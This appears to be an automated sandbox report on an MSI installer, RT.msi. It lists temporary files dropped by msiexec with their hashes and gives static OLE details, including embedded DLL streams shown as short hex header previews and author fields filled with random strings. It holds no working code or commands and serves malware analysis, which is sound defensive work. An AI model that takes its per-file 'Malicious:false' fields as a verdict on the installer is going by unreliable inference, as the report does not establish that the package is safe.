                                                                                              Preview: .To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                                                                              C:\Windows\Temp\~DF2D8F7E6192B44538.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DF31056590C499E1F9.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DF310D16AF79498C8F.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):1.5831763444891178
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:f8PhluRc06WXOknT5dKtnSKpAEKgCy4okVnSKtT01rQr5:ehl1SnTGV4kChcrQN
                                                                                              MD5:855FFB70E32FB384D7CC75A5373BDF90
                                                                                              SHA1:70E6C9BAE7311140AE2F4C1004F364243433CBC0
                                                                                              SHA-256:6B050B89F967D15011E20855C8B7111478BA509D7AE076775FE597F2D00A63E7
                                                                                              SHA-512:B58E0861FC564DF5A503E8590F3599D4DD04AEDB302AD318C2F5D8A2F4AE73EB9D57882F632C1F40DDF1DD13E98BF4647459144209C1CB27F6EA344617161C9F
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DF47AE84FCE3E0686D.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):1.2670847345881584
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:OyduyNvcFXO7T5DKtnSKpAEKgCy4okVnSKtT01rQr5:Fdi2T4V4kChcrQN
                                                                                              MD5:1D3B27189709F5C55CE63EC64736D3F0
                                                                                              SHA1:7827702668A5C530B5F0E880E28EB32019FCC328
                                                                                              SHA-256:423E8739337E2720A9294CEC827CFC3B5E4D1704684B0496D547A60A0A6DC18C
                                                                                              SHA-512:C36C9E4BE7EC4DC94F8CFB5D8244E3777B252DC7382A727F2B9C7E1E82974D646052946BC4B22ADB06CA7E9AEE2CFC53780B2F895BC8E014A9059D40E96CE8FB
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DF4D256A91056ADAE5.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):1.5831763444891178
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:f8PhluRc06WXOknT5dKtnSKpAEKgCy4okVnSKtT01rQr5:ehl1SnTGV4kChcrQN
                                                                                              MD5:855FFB70E32FB384D7CC75A5373BDF90
                                                                                              SHA1:70E6C9BAE7311140AE2F4C1004F364243433CBC0
                                                                                              SHA-256:6B050B89F967D15011E20855C8B7111478BA509D7AE076775FE597F2D00A63E7
                                                                                              SHA-512:B58E0861FC564DF5A503E8590F3599D4DD04AEDB302AD318C2F5D8A2F4AE73EB9D57882F632C1F40DDF1DD13E98BF4647459144209C1CB27F6EA344617161C9F
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DF975D8E8BA408B701.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):73728
                                                                                              Entropy (8bit):0.14326892884980463
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:1rQr5WRTxwttipVwtjwttipVwtzAEVwtyjCy4oVO3wG5f+cP:1rQr5WRT2nSKOnSKpAEKgCy4oktD
                                                                                              MD5:64A2FFEB004F38815EC565E06327A746
                                                                                              SHA1:6FDA70E6B543695B53CB4CF92AA958A8CC5FFE2D
                                                                                              SHA-256:0FA92DC3D4B68AD9D9B9AF6200F0693B993F2B78E0A825019C594872A8288F50
                                                                                              SHA-512:132451E0B6229955367EE15C5E8D2768E91BED59270B0B8FBAE407B5B5E303D1634B1354BD3858182B3E916DCD159B05BDD6BFA213921B7EBA878F3E9BB550E4
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DFCF73F4561EA0A567.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DFD2E701823BB25637.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):1.2670847345881584
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:OyduyNvcFXO7T5DKtnSKpAEKgCy4okVnSKtT01rQr5:Fdi2T4V4kChcrQN
                                                                                              MD5:1D3B27189709F5C55CE63EC64736D3F0
                                                                                              SHA1:7827702668A5C530B5F0E880E28EB32019FCC328
                                                                                              SHA-256:423E8739337E2720A9294CEC827CFC3B5E4D1704684B0496D547A60A0A6DC18C
                                                                                              SHA-512:C36C9E4BE7EC4DC94F8CFB5D8244E3777B252DC7382A727F2B9C7E1E82974D646052946BC4B22ADB06CA7E9AEE2CFC53780B2F895BC8E014A9059D40E96CE8FB
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DFE1E42CA31BE974B9.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):0.06815851942014853
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOyVDfV7fAVky6lO:2F0i8n0itFzDHFyFV7DO
                                                                                              MD5:D80DFA3AED331A078C0B9D34B0D4DD4A
                                                                                              SHA1:D2CBC76948976C196FC2A3AE3E2930687E571F81
                                                                                              SHA-256:ABA3E4648874FC5BA8FE3F971FB3A52A323D9E6BF333C6B01DE0A3B14FAA5B0D
                                                                                              SHA-512:57A36E236D9221B688AFC04FCA811D0A086F39622BAEFA37EBB2818D1EADBD962ECF4AA5C92DA525BA838BDEFA9065B01A9746B7E85AB670F6A17398943866D8
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DFEF07E606ECE8549B.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DFEF2054CCB8CD54A3.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Windows\Temp\~DFFDE8909A305681F7.TMP
                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):1.2670847345881584
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:OyduyNvcFXO7T5DKtnSKpAEKgCy4okVnSKtT01rQr5:Fdi2T4V4kChcrQN
                                                                                              MD5:1D3B27189709F5C55CE63EC64736D3F0
                                                                                              SHA1:7827702668A5C530B5F0E880E28EB32019FCC328
                                                                                              SHA-256:423E8739337E2720A9294CEC827CFC3B5E4D1704684B0496D547A60A0A6DC18C
                                                                                              SHA-512:C36C9E4BE7EC4DC94F8CFB5D8244E3777B252DC7382A727F2B9C7E1E82974D646052946BC4B22ADB06CA7E9AEE2CFC53780B2F895BC8E014A9059D40E96CE8FB
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {90C8377A-5982-4C58-B235-2331AE02F8EE}, Number of Words: 10, Subject: BND0WEPWEJFC-9UEWFF, Author: WEFHWE0-FWEUY-F9WUEFWWEF, Name of Creating Application: Advanced Installer 16.5 build 8df7ad95, Template: ;1046, Comments: F3WBNWE09WE8FY0-WE9FJP, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                              Entropy (8bit):6.572729935205617
                                                                                              TrID:
                                                                                              • Microsoft Windows Installer (77509/1) 52.18%
                                                                                              • Windows SDK Setup Transform Script (63028/2) 42.43%
                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 5.39%
                                                                                              File name:RT.msi
                                                                                              File size:2307584
                                                                                              MD5:55b75999aeba3ccfd5309b39d7880baa
                                                                                              SHA1:293a2c7cd6ab5851563d868d549e9a2dfd00842c
                                                                                              SHA256:e07e5f0295deb4c8a77519cf41d915046d6962db92b7e667f68267d30e0b8399
                                                                                              SHA512:59a8bad2040260f13ec4171e5ce6f28b04b1d6705aed4d7c9a9270c472062095bd4ec8cdc38fe962a55b8f8bc0b8f5afc4565d99f3dffee87dc12b107f9fd76f
                                                                                              SSDEEP:49152:nglrz5io+HGGWxyzYlrXVVdWgAhmLQr+uclpUO3mDOSP9HnoA/s5tFsy3I1XF2Et:LGGWDlDAhmLpUUEXF2DY
                                                                                              File Content Preview:........................>...................$...........................................................................................................................................<...=...>...?...@...A...B.......r......................................

                                                                                              File Icon

                                                                                              Icon Hash:a2a0b496b2caca72

                                                                                              Static OLE Info

                                                                                              General

                                                                                              Document Type:OLE
                                                                                              Number of OLE Files:1

                                                                                              OLE File "RT.msi"

                                                                                              Indicators

                                                                                              Has Summary Info:True
                                                                                              Application Name:Advanced Installer 16.5 build 8df7ad95
                                                                                              Encrypted Document:False
                                                                                              Contains Word Document Stream:False
                                                                                              Contains Workbook/Book Stream:False
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:
                                                                                              Flash Objects Count:
                                                                                              Contains VBA Macros:False

                                                                                              Summary

                                                                                              Code Page:1252
                                                                                              Title:Installation Database
                                                                                              Subject:BND0WEPWEJFC-9UEWFF
                                                                                              Author:WEFHWE0-FWEUY-F9WUEFWWEF
                                                                                              Keywords:Installer, MSI, Database
                                                                                              Comments:F3WBNWE09WE8FY0-WE9FJP
                                                                                              Template:;1046
                                                                                              Last Saved By:
                                                                                              Revion Number:{90C8377A-5982-4C58-B235-2331AE02F8EE}
                                                                                              Last Printed:2009-12-11 11:47:44.850000
                                                                                              Create Time:2009-12-11 11:47:44.850000
                                                                                              Last Saved Time:2009-12-11 11:47:44.850000
                                                                                              Number of Pages:200
                                                                                              Number of Words:10
                                                                                              Creating Application:Advanced Installer 16.5 build 8df7ad95
                                                                                              Security:0

                                                                                              Streams

                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 540
                                                                                              General
                                                                                              Stream Path:\x5SummaryInformation
                                                                                              File Type:data
                                                                                              Stream Size:540
                                                                                              Entropy:4.47903006651
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . @ . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . # . . W z . . @ . . . # . . W z . . @ . . . # . . W z . . . . . . . . . . . . . . . . . . . . . . ' . . . { 9 0 C 8 3 7 7 A - 5 9
                                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ec 01 00 00 10 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 01 00 00 00 b4 00 00 00 09 00 00 00 bc 00 00 00 0f 00 00 00 ec 00 00 00 03 00 00 00 f4 00 00 00 04 00 00 00 10 01 00 00
                                                                                              Stream Path: \x17163\x16689\x18229\x15358\x17388\x15912\x16947\x16693\x17207\x17522\x18358\x17383\x18479, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 474784
                                                                                              General
                                                                                              Stream Path:\x17163\x16689\x18229\x15358\x17388\x15912\x16947\x16693\x17207\x17522\x18358\x17383\x18479
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Stream Size:474784
                                                                                              Entropy:6.57690306292
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . X . . . 9 s . . 9 s . . 9 s . . _ p . . 9 s . . _ v . / 9 s . . _ w . . 9 s . . T v . . 9 s . . T w . . 9 s . . T p . . 9 s . W T w . . 9 s . W T p . . 9 s . . _ r . . 9 s . . 9 r . . 8 s . W T z . . 9 s . W T s . . 9 s . W T . . . 9 s . . 9 . . . 9 s .
                                                                                              Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                                                              Stream Path: \x17163\x16689\x18229\x15870\x18088, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318
                                                                                              General
                                                                                              Stream Path:\x17163\x16689\x18229\x15870\x18088
                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                                                                              Stream Size:318
                                                                                              Entropy:2.03444158006
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                                                                              Stream Path: \x17163\x16689\x18229\x16190\x17010\x18103\x17764\x15208\x17896\x16808\x17591\x18357\x17383\x18479, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 845472
                                                                                              General
                                                                                              Stream Path:\x17163\x16689\x18229\x16190\x17010\x18103\x17764\x15208\x17896\x16808\x17591\x18357\x17383\x18479
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Stream Size:845472
                                                                                              Entropy:6.50553549424
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . " . . . f n . M f n . M f n . M . . . L h n . M . . . L . n . M g . . L 7 n . M g . . L w n . M g . . L p n . M . . . L ~ n . M . . . L g n . M . . . L G n . M f n . M | o . M . . . L K n . M . . . L g n . M . . = M g n . M f n U M g n . M . . . L g n . M
                                                                                              Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                                                              Stream Path: \x17163\x16689\x18229\x16318\x18483, File Type: MS Windows icon resource - 1 icon, 16x16, 16 colors, Stream Size: 318
                                                                                              General
                                                                                              Stream Path:\x17163\x16689\x18229\x16318\x18483
                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                                                                              Stream Size:318
                                                                                              Entropy:2.03693614652
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                                                                              Stream Path: \x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 388768
                                                                                              General
                                                                                              Stream Path:\x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Stream Size:388768
                                                                                              Entropy:6.41862612743
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . F . e . . . . . . . . . . . . . g . . . . . . . g . . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . g . . . . . . . g . . . . . . . g . . . . . . . . . . . J . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                                                              Stream Path: \x17163\x16689\x18229\x16766\x17508\x16945\x18485, File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3, Stream Size: 2818
                                                                                              General
                                                                                              Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18485
                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3
                                                                                              Stream Size:2818
                                                                                              Entropy:7.55703063679
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . ' " , # . . ( 7 ) , 0 1 4 4 4 . ' 9 = 8 2 < . 3 4 2 . . . C . . . . . . . . . . . 2 ! . ! 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 . . . . . . ; . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . ! 1 A . . Q a . " q . 2 . . . . #
                                                                                              Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32
                                                                                              Stream Path: \x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490, File Type: MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel, Stream Size: 2862
                                                                                              General
                                                                                              Stream Path:\x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490
                                                                                              File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                              Stream Size:2862
                                                                                              Entropy:3.16043065194
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . ( . . . 6 . . . . . . . . . . . h . . . ^ . . . . . . . . . . h . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w v . . . . . " " " " " o . . " " " " " o . . w w w " " . . . . . . " / . . . .
                                                                                              Data Raw:00 00 01 00 03 00 10 10 10 00 00 00 04 00 28 01 00 00 36 00 00 00 10 10 00 00 00 00 08 00 68 05 00 00 5e 01 00 00 10 10 00 00 00 00 20 00 68 04 00 00 c6 06 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0
